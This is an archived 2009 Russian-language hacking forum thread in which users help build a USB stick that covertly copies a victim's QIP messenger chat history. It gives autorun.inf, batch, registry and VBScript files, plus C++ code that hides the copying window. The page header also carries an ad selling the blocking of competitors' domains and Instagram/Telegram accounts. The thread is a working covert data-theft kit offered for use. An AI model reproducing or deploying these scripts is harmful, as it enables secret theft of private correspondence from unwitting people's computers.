УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Безопасность > Windows
Как спрятать процесс копирования.

Опции темы

Поиск в этой теме

Опции просмотра

Как спрятать процесс копирования.

30.06.2009, 16:17

space_ninja

Новичок

Регистрация: 25.06.2009

Сообщений: 25

Провел на форуме:
42449

Репутация: 12

Как спрятать процесс копирования.

Поставил себе задачу, сделать флешку предназначенную для стыривания инфы, для конкретики решил копировать хистори квипа. Получилось следующее:

autorun.inf

Цитата:

[Autorun]
Shell="CMD"
ShellExecute="1.bat"
Icon = "autorun.ico"

1.bat

Цитата:

chcp 1251
xcopy "C:\Documents and Settings\%USERNAME%\Application Data\QIP\Profiles\*" ..\desktop /C /H /Q /S /Y /Z
chcp 866

И забацал файлик чтобы двумя кликами менять свойства ауторана в Винде.
autorun.reg

Цитата:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\policies\Explorer]
"NoDriveTypeAutoRun"=dword:0000005b

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curre ntVersion\policies\Explorer]
"NoDriveTypeAutoRun"=dword:0000005b

Но вот проблема возникла, хочется окно процессом копирования скрыть.
Реально ли такое штатными средствами Винды или все-таки кодить надо?

30.06.2009, 17:15

$Аватар для \\ChaOs//$

\\ChaOs//

Познающий

Регистрация: 26.02.2009

Сообщений: 65

Провел на форуме:
583734

Репутация: 34

$Отправить сообщение для \\ChaOs// с помощью ICQ$

Вот держи, набросал в с++

тынц

Синтаксис:

Код:

execute.exe "путь до файла\file"

Пример:

Код:

execute.exe d:/autorun/1.bat

Исходник:

Код:

#include "stdafx.h"
#include "shellapi.h"


int APIENTRY _tWinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPWSTR lpCmdLine,int nShowCmd)
{
if(*lpCmdLine)

	ShellExecute(NULL,L"open",lpCmdLine,NULL,NULL,SW_HIDE);
else
{
	MessageBox(NULL,L"Неверно заданы параметры.\nСинтаксис: execute.exe filename.",L"Ошибка",MB_ICONASTERISK);
	return 1;
}
 	return 0;
}

Программа запускает файл с флагом HIDE, тоесть запущенный файл нигде кроме как в процессах не увидешь.

Последний раз редактировалось \\ChaOs//; 30.06.2009 в 21:50..

30.06.2009, 21:18

Huster

Познающий

Регистрация: 08.05.2009

Сообщений: 46

Провел на форуме:
1403678

Репутация: 55

Отправить сообщение для Huster с помощью ICQ

Цитата:

Но вот проблема возникла, хочется окно процессом копирования скрыть.

Вот есть такая программка которая bat в exe конвертирует и черное окошко скрывает. Скачать можно тут https://forum.antichat.ru/showthread.php?t=75136

30.06.2009, 22:24

Lamia

Участник форума

Регистрация: 11.07.2007

Сообщений: 190

Провел на форуме:
254313

Репутация: 185

Не нужно бат!Чистое вин апи те поможет!

02.07.2009, 02:32

Fepsis

Постоянный

Регистрация: 17.09.2008

Сообщений: 562

Провел на форуме:
6962560

Репутация: 536

Цитата:

Сообщение от space_ninja

Реально ли такое штатными средствами Винды или все-таки кодить надо?

Реально... Юзай VBScript...
Вообще можешь сделать всё своим же батником, но запустив его безпалевно через .vbs

Код:

Set WshShell = CreateObject("WScript.Shell") 
WshShell.Run "cmd.exe /c 1.bat", 0, false

02.07.2009, 13:08

space_ninja

Новичок

Регистрация: 25.06.2009

Сообщений: 25

Провел на форуме:
42449

Репутация: 12

всем спасибо )
решил через vbs сделать.

в итоге имеем
autorun.inf

Цитата:

[Autorun] ShellExecute="1.vbs" Icon = "autorun.ico"

1.vbs

Цитата:

Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "cmd.exe /c 1.bat", 0, false

1.bat

Цитата:

chcp 1251
xcopy "C:\Documents and Settings\%USERNAME%\Application Data\QIP\Profiles\*" ..\desktop /C /H /Q /S /Y /Z
chcp 866

reg_enable.reg

Цитата:

и наличие папки desktop в корне флехи с правами на изменение.

из всех действий требуется только запустить авторан, два раз кликнув по значку флехи в папке "мой компьютер", все средства штатные )

Снимается убиванием процесса cmd.exe в диспетчере задач.

Если ситуация специфичная, то достаточно запустить 1.vbs (ну или как вам его понравится назвать, это уже из раздела лирики))) или можно установить разрешение на запуск авторана запустив файл reg_enable.reg

качать тут

Вроде все ))
если будут у кого-то еще идеи по совершенствования буду рад.

пойду поприкалываюсь )
всем респект и благодарности

Последний раз редактировалось space_ninja; 02.07.2009 в 17:43..

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход